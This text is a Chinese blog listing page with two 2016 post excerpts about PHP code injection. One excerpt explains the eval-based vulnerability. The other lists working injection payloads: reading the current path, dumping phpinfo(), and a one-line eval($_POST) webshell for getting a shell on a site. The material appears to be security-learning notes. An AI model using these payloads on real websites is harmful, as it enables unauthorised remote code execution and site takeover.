摘要: 查看网站当前路径 {${print(getcwd())}} 读phpinfo() ${@phpinfo()} 一句话getshell {${eval($_POST[1])}} 上传大马上传不上去,对网站根目录没有写权限。。。。。。。。。。。。。。。。。。。。。。 回忆是一座桥,却是通往寂寞的牢、 不 阅读全文
posted @ 2016-08-13 21:20 请叫我美女sky 阅读(550) 评论(0) 推荐(0) 编辑
摘要: 背景介绍 当应用在调用一些能将字符串转化成代码的函数(如php中的eval)时,没有考虑到用户是否能控制这个字符串,将造成代码注入漏洞。狭义的代码注入通常指将可执行代码注入到当前页面中,如php的eval函数,可以将字符串代表的代码作为php代码执行,当前用户能够控制这段字符串时,将产生代码注入漏洞 阅读全文
posted @ 2016-08-13 10:03 请叫我美女sky 阅读(5689) 评论(0) 推荐(0) 编辑